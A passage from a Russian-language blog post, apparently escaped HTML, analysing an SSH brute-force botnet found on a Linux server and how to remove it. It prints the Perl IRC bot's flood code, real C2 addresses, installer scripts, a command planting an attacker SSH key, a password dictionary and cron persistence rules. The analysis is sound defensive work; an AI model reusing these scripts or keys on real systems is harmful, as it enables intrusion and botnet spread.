&quot;PRIVMSG $printl :\\002Timp\\002: $dtime&quot;.&quot;secunde.&quot;);                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Total packet\\002: &quot;.($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));        
        sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Total bytes\\002: &quot;.($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Flood\\002: &quot;.int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})\/1024)\/$dtime).&quot; kbps&quot;);              }            }            exit;        }   } }<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u0411\u0435\u0433\u043b\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442, \u0447\u0442\u043e \u0431\u043e\u0442 \u043a\u043e\u043e\u0440\u0434\u0438\u043d\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0441 IRC \u0441\u0435\u0440\u0432\u0435\u0440\u0430 <code>45.9.148.125:443<\/code>. \u0424\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439. \u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c<\/p>\n<p>  <\/p>\n<ul>\n<li>\u041f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 Shell \u043a\u043e\u043c\u0430\u043d\u0434\u044b, \u0441\u0443\u0434\u044f \u043f\u043e \u043a\u043e\u0434\u0443, \u0432 \u0442.\u0447. 
\u0438 \u043d\u0430 Win32<\/li>\n<li>\u0411\u044b\u0441\u0442\u0440\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0440\u0442\u043e\u0432 &quot;21&quot;,&quot;22&quot;,&quot;23&quot;,&quot;25&quot;,&quot;53&quot;,&quot;80&quot;,&quot;110&quot;,&quot;143&quot;,&quot;6665&quot; \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430<\/li>\n<li>\u0421\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e url \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0436\u0435\u0440\u0442\u0432\u044b<\/li>\n<li>\u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0430 \u043f\u043e\u0440\u0442\u043e\u0432 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430<\/li>\n<li>UDP \u0444\u043b\u0443\u0434 \u0441 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0439 \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u044c\u044e \u043d\u0430 \u0432\u044b\u0431\u0440\u0430\u043d\u043d\u044b\u0439 \u0445\u043e\u0441\u0442<\/li>\n<li>UDP \u0444\u043b\u0443\u0434 \u0441 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0439 \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u044c\u044e \u043d\u0430 \u043f\u043e\u0434\u0441\u0435\u0442\u044c<\/li>\n<li>\u041e\u0431\u0440\u0430\u0442\u043d\u043e\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u043f\u043e TCP \u0441 \u0432\u044b\u0431\u0440\u0430\u043d\u043d\u044b\u043c \u0445\u043e\u0441\u0442\u043e\u043c (\u043a\u043e\u043c\u0430\u043d\u0434\u0430 <code>conback<\/code>; \u0441\u0443\u0434\u044f \u043f\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 <code>$shell<\/code>, \u0441 \u0437\u0430\u043f\u0443\u0441\u043a\u043e\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438)<\/li>\n<li>\u041a\u043e\u043c\u0431\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0444\u043b\u0443\u0434 igmp, udp, icmp, tcp \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0443 
\u043f\u043e\u0440\u0442\u043e\u0432 \u043d\u0430 \u0445\u043e\u0441\u0442\u0435<\/li>\n<\/ul>\n<p>  <\/p>\n<p>\u0412 \u0441\u043a\u0440\u0438\u043f\u0442\u0435 \u0442\u0430\u043a\u0436\u0435 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 url: <code>http:\/\/www.minpop.com\/sk12pack\/idents.php<\/code> \u0438 <code>http:\/\/www.minpop.com\/sk12pack\/names.php<\/code>, \u043e\u0434\u043d\u0430\u043a\u043e \u043e\u043d\u0438 \u0432\u044b\u0433\u043b\u044f\u0434\u044f\u0442 \u043d\u0435\u0440\u0430\u0431\u043e\u0447\u0438\u043c\u0438.<\/p>\n<p>  <\/p>\n<p>\u042d\u0442\u043e\u0433\u043e \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0430 \u0445\u0432\u0430\u0442\u0430\u0435\u0442, \u0447\u0442\u043e\u0431\u044b \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0433 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b.<\/p>\n<p>  <\/p>\n<h3 id=\"skaner-brutforser\">\u0421\u043a\u0430\u043d\u0435\u0440-\u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441\u0435\u0440<\/h3>\n<p>  <\/p>\n<p>\u0421\u0430\u043c\u0430\u044f \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u043c\u0430\u043b\u0432\u0430\u0440\u0438. 
\u0411\u0443\u0434\u0443\u0447\u0438 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u043c, \u0441\u043a\u0430\u043d\u0435\u0440 \u0432\u0438\u0434\u0435\u043d \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043a\u0430\u043a \u043f\u0440\u043e\u0446\u0435\u0441\u0441 <code>tsm<\/code> \u0438 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434\u043e\u0431\u0440\u0430\u0442\u044c ssh \u043f\u0430\u0440\u043e\u043b\u0438 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 N \u0445\u043e\u0441\u0442\u0430\u0445 \u0438 \u0437\u0430\u0440\u0430\u0437\u0438\u0442\u044c \u0438\u0445. \u0412 \u043c\u043e\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435, \u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u0444\u0430\u0439\u043b \u0441 70\u043a ip \u0430\u0434\u0440\u0435\u0441\u0430\u043c\u0438 \u0438 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0441\u043b\u043e\u0432\u0430\u0440\u044c \u0442\u0438\u043f\u043e\u0432\u044b\u0445 \u043f\u0430\u0440\u043e\u043b\u0435\u0439. \u0421\u043a\u0430\u043d\u0435\u0440 \u0438\u043c\u0435\u0435\u0442 \u0441\u0432\u043e\u0438 \u0440\u0430\u043d\u0442\u0430\u0439\u043c \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 (std, openssh, dns, resolv,pthread) \u043f\u043e\u0434 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b <code>x32<\/code>, <code>x64<\/code>, <code>armv7<\/code>. \u0417\u0430 \u0441\u0447\u0435\u0442 \u044d\u0442\u043e\u0433\u043e, \u0437\u0430\u0440\u0430\u0437\u0430 \u043c\u043e\u0436\u0435\u0442 \u0432\u0435\u0435\u0440\u043d\u043e \u0437\u0430\u0440\u0430\u0436\u0430\u0442\u044c \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432 \u043d\u0430 \u0440\u0430\u0437\u043d\u044b\u0445 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0430\u0445. 
\u041a\u0430\u0436\u0434\u0430\u044f \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0447\u0430\u0441\u0442\u044c\u044e \u0431\u043e\u0442\u043d\u0435\u0442\u0430 \u0438 \u043d\u0430\u0440\u0430\u0449\u0438\u0432\u0430\u0435\u0442 \u043c\u043e\u0449\u043d\u043e\u0441\u0442\u044c \u0441\u0435\u0442\u0438.<\/p>\n<p>  <\/p>\n<p>\u0412\u043d\u0443\u0442\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u044f \u043d\u0430\u0448\u0435\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0441\u0442\u0440\u043e\u043a\u0438<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">help<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">----------------------&gt;Faster than light&lt;----------------------------- ---------------------&gt;use only for testing&lt;--------------------------- Use: scan [OPTIONS] [[USER PASS]] FILE] [IPs\/IPs Port FILE]         -t [NUMTHREADS]: Change the number of threads used. Default is %d         -m [MODE]: Change the way the scan works. Default is %d         -f [FINAL SCAN]: Does a final scan on found servers. Default is %d         Use -f 1 for A.B class \/16. Default is 2 for A.B.C \/24         -i [IP SCAN]: use -i 0 to scan ip class A.B. Default is %d         if you use -i 0 then use .\/scan -p 22 -i 0 p 192.168 as agrument for ip file         -m 0 for non selective scanning         -P 0 leave default password unchanged. Changes password by default.         -s [TIMEOUT]: Change the timeout. Default is %ld         -S [2ndTIMEOUT]: Change the 2nd timeout. Default is %ld         -p [PORT]: Specify another port to connect to. 0 for multiport         -c [REMOTE-COMMAND]: Command to execute on connect. 
Use ; or &amp;&amp; with commands Use: .\/scan -t 202 -s 5 -S 5 p ip -c &quot;uname&quot; Use: .\/scan -t 202 -s 5 -S 5 -i 0 -p 22 p 192.168 The example above will scan 192.168 port 22 and brute force the IP list. Use: .\/scan -t 202 -s 5 -S 5 -p 0 p ip - for &quot;ip port&quot; file Use: .\/scan -t 202 -s 5 -S 5 -p 23 -m 0 p ip - for other protocols When using -m 1 (default value) the scan will only target full linux machines or windows machines with openssh installed. Routers, busyboxes honeypots and other limited linux devices will be skipped from the output. Use -m 0 for non-selective scanning (can be used for all type of ssh devices) this includes busyboxes, routers, honeypots and other devices with limited commands. ================================================================ ==========================================================================<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0417\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0432 base64 \u0441\u043a\u0440\u0438\u043f\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0430, \u0432\u0430\u0440\u0438\u0430\u043d\u0442 1<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">#!\/bin\/bash cd \/tmp  rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix mkdir .X19-unix cd .X19-unix mv \/var\/tmp\/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s &amp;&amp; cd .rsync; cat \/tmp\/.X19-unix\/.rsync\/initall | bash 2&gt;1&amp; sleep 45s &amp;&amp; pkill -9 run &amp;&amp; pkill -9 go &amp;&amp; pkill -9 tsm exit 0<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0417\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0432 base64 \u0441\u043a\u0440\u0438\u043f\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0430, \u0441 
\u0437\u0430\u043f\u0443\u0441\u043a\u043e\u043c \u0441\u043a\u0430\u043d\u0435\u0440\u0430<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">#!\/bin\/bash cd \/tmp  rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix mkdir .X19-unix cd .X19-unix mv \/var\/tmp\/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s &amp;&amp; cd \/tmp\/.X19-unix\/.rsync\/c nohup \/tmp\/.X19-unix\/.rsync\/c\/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 \/tmp\/up.txt 192.168 &gt;&gt; \/dev\/null 2&gt;1&amp; sleep 8m &amp;&amp; nohup \/tmp\/.X19-unix\/.rsync\/c\/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 \/tmp\/up.txt 172.16 &gt;&gt; \/dev\/null 2&gt;1&amp; sleep 20m &amp;&amp; cd ..; \/tmp\/.X19-unix\/.rsync\/initall 2&gt;1&amp; exit 0<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">C\u043a\u0440\u0438\u043f\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0430 ssh \u043a\u043b\u044e\u0447\u0430<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">cd ~ &amp;&amp; rm -rf .ssh &amp;&amp; mkdir .ssh &amp;&amp; echo &quot;ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2\/9p7+vD0EpZ3Tz\/+0kX34uAx1RV\/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr&quot;&gt;&gt;.ssh\/authorized_keys &amp;&amp; chmod -R go= ~\/.ssh &amp;&amp; cd ~<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u0422\u0430\u043a \u0436\u0435 \u0435\u0441\u0442\u044c \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 ip \u0430\u0434\u0440\u0435\u0441\u043e\u0432 <code>45.9.148.129<\/code> \u0438 <code>45.9.148.125<\/code>, \u043d\u0430\u0445\u043e\u0434\u044f\u0449\u0438\u0445\u0441\u044f \u0432 
\u041d\u0438\u0434\u0435\u0440\u043b\u0430\u043d\u0434\u0430\u0445.<\/p>\n<p>  <\/p>\n<p>\u0421\u043b\u043e\u0432\u0430\u0440\u044c \u0434\u043b\u044f \u043f\u043e\u0434\u0431\u043e\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u2014 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439, \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u0432 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u043c \u0444\u0430\u0439\u043b\u0435.<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043b\u043e\u0432\u0430\u0440\u044c \u043f\u043e\u0434\u0431\u043e\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u0435\u0439<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">jabez jabez admin smiles root campbell jawad jawad test $$$$$$$$ root wangjianjun sdtdserver sdtdserver idea idea foundry 123456 citlalli citlalli root sensor123 info info333 kaasen kaasen root Million2017 jakayla jakayla edineide edineide wikre wikre guest edges games nobody123 vcsa hhhhhhh root sq root root@1234567890 ftpuser password! 
web nobody0000 root jyy mysql chelu charming 123456 web web1111 pscsec pscsec root michell louhellen louhellen xgridagent xgridagent alligator alligator root subrosa denny password ftp 1220 rival rival root 9i8u7y root general1 smenes smenes root password@1234567890 support testing root 123asdfghjkl smmsp 12330 root fladvert picher picher backup farrell hung root2root guest shinobu sacre sacre123<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u041f\u043e \u0441\u043a\u0440\u0438\u043f\u0442\u0430\u043c \u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0441\u0430\u043c \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432 \u043c\u0430\u043b\u0432\u0430\u0440\u0438 \u043b\u0435\u0436\u0438\u0442 \u0432 \u0430\u0440\u0445\u0438\u0432\u0435 <code>dota3.tar.gz<\/code>, \u043e\u0434\u043d\u0430\u043a\u043e \u043c\u043d\u0435 \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043f\u043e\u043d\u044f\u0442\u044c, \u043a\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043e\u043d \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443. \u042f\u0432\u043d\u043e\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u0438\u0432\u044b \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u0430 \u043d\u0435\u0442. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043e\u043d \u043f\u043e\u0434\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0431\u044d\u043a\u0434\u043e\u0440. 
\u0415\u0441\u043b\u0438 \u0443 \u0412\u0430\u0441 \u0435\u0441\u0442\u044c \u0438\u0434\u0435\u0438 \u043d\u0430 \u044d\u0442\u043e\u0442 \u0441\u0447\u0435\u0442, \u043f\u0438\u0448\u0438\u0442\u0435 \u0432 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u044b.<\/p>\n<p>  <\/p>\n<h3 id=\"lancher\">\u041b\u0430\u043d\u0447\u0435\u0440<\/h3>\n<p>  <\/p>\n<p>\u0412 \u043c\u043e\u043c\u0435\u043d\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430, \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u043f\u0440\u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0441\u0435\u0431\u044f \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0443 cron \u0434\u043b\u044f \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0412 \u043f\u0430\u043f\u043a\u0435 <code>\/var\/spool\/cron\/crontabs\/&lt;username&gt;<\/code> \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0444\u0430\u0439\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u044f<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u041f\u0440\u0430\u0432\u0438\u043b\u0430 cron<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">0 0 *\/3 * * \/dev\/shm\/.lwp\/.rsync\/a\/upd&gt;\/dev\/null 2&gt;&amp;1 5 8 * * 0 \/dev\/shm\/.lwp\/.rsync\/b\/sync&gt;\/dev\/null 2&gt;&amp;1 @reboot \/dev\/shm\/.lwp\/.rsync\/b\/sync&gt;\/dev\/null 2&gt;&amp;1 0 0 *\/3 * * \/dev\/shm\/.lwp\/.rsync\/c\/aptitude&gt;\/dev\/null 2&gt;&amp;1<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u0432 \u043d\u0435\u043c \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442\u0441\u044f \u0432\u0441\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b, \u043e\u0442\u043d\u043e\u0441\u044f\u0449\u0438\u0435\u0441\u044f \u043a 
\u0437\u043b\u043e\u0432\u0440\u0435\u0434\u0443.<\/p>\n<p>  <\/p>\n<h2 id=\"pora-pokonchit-s-etim-bezobraziem\">\u041f\u043e\u0440\u0430 \u043f\u043e\u043a\u043e\u043d\u0447\u0438\u0442\u044c \u0441 \u044d\u0442\u0438\u043c \u0431\u0435\u0437\u043e\u0431\u0440\u0430\u0437\u0438\u0435\u043c!<\/h2>\n<p>  <\/p>\n<p>\u041c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043e \u0442\u043e\u043c, \u043a\u0430\u043a \u0432\u0435\u0434\u0435\u0442 \u0441\u0435\u0431\u044f \u0437\u043b\u043e\u0432\u0440\u0435\u0434. \u0422\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u044e \u0434\u043b\u044f \u043e\u0447\u0438\u0441\u0442\u043a\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043e\u0442 \u043d\u0435\u0433\u043e.<\/p>\n<p>  <\/p>\n<p>\u0423\u0431\u0438\u0440\u0430\u0435\u043c cron \u0437\u0430\u0434\u0430\u0447\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">rm -rf \/var\/spool\/cron\/crontabs\/&lt;username&gt;<\/code><\/pre>\n<p>  <\/p>\n<p>\u0423\u0431\u0438\u0432\u0430\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u044e\u0437\u0435\u0440\u0430<\/p>\n<p>  <\/p>\n<pre><code class=\"bash\">pkill -u &lt;username&gt;<\/code><\/pre>\n<p>  <\/p>\n<p>\u0423\u0431\u0438\u0440\u0430\u0435\u043c \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0439 ssh \u043a\u043b\u044e\u0447<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">rm \/home\/&lt;username&gt;\/.ssh\/authorized_keys<\/code><\/pre>\n<p>  <\/p>\n<p>\u0423\u0434\u0430\u043b\u044f\u0435\u043c \u0441\u0430\u043c \u0437\u043b\u043e\u0432\u0440\u0435\u0434<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">rm -rf \/dev\/shm\/.lwp<\/code><\/pre>\n<p>  <\/p>\n<p>\u042f \u0442\u0430\u043a\u0436\u0435 
\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0432\u044b\u0448\u0435 \u0434\u0432\u0430\u0436\u0434\u044b \u0438 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u044e\u0437\u0435\u0440\u0430 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u043f\u0430\u043f\u043a\u043e\u0439. \u041f\u0440\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438, \u0435\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0437\u0430\u043d\u043e\u0432\u043e.<\/p>\n<p>  <\/p>\n<h2 id=\"chto-delat-s-zablokirovannym-ip-adresom\">\u0427\u0442\u043e \u0434\u0435\u043b\u0430\u0442\u044c \u0441 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c IP \u0430\u0434\u0440\u0435\u0441\u043e\u043c?<\/h2>\n<p>  <\/p>\n<p>\u042f \u043f\u043e\u0437\u0432\u043e\u043d\u0438\u043b \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0443 \u0438 \u0441\u043e\u043e\u0431\u0449\u0438\u043b \u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435, \u043c\u0435\u043d\u044f \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0432\u044b\u0441\u043b\u0443\u0448\u0430\u043b\u0438 \u0438 \u043f\u043e\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043b\u0438 \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043e\u0431 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0435 \u0432 \u0441\u0430\u043f\u043f\u043e\u0440\u0442, \u043f\u0440\u0438\u043b\u043e\u0436\u0438\u0432 \u0432\u0441\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u044b. 
\u041d\u0438\u043a\u0430\u043a\u0438\u0445 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u043e \u0440\u0430\u0437\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0435 IP \u043c\u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c. \u041c\u043d\u0435 \u043f\u043e\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043b\u0438 \u043f\u043e\u043c\u0435\u043d\u044f\u0442\u044c \u0435\u0433\u043e \u043d\u0430 \u043d\u043e\u0432\u044b\u0439 \u0447\u0435\u0440\u0435\u0437 \u041b\u041a, \u0430 \u0441\u0442\u0430\u0440\u044b\u0439 \u0430\u0434\u0440\u0435\u0441 \u0432\u0435\u0440\u043d\u0443\u043b\u0441\u044f \u0432 \u043f\u0443\u043b \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439. \u041c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c, \u043a\u0442\u043e-\u0442\u043e \u0441 \u0425\u0430\u0431\u0440\u0430 \u043f\u043e\u0434\u0441\u043a\u0430\u0436\u0435\u0442, \u043a\u0430\u043a \u0441\u043d\u044f\u0442\u044c \u0441 \u0430\u0434\u0440\u0435\u0441\u0430 \u0447\u0435\u0440\u043d\u0443\u044e \u043c\u0435\u0442\u043a\u0443?<\/p>\n<p>  <\/p>\n<h2 id=\"kakaya-sistema-uyazvima-dlya-podobnoy-ataki\">\u041a\u0430\u043a\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u0430 \u0434\u043b\u044f \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438<\/h2>\n<p>  <\/p>\n<p>\u0412 \u0441\u0443\u0449\u043d\u043e\u0441\u0442\u0438, \u043b\u044e\u0431\u0430\u044f Linux \u0441\u0438\u0441\u0442\u0435\u043c\u0430, \u0443 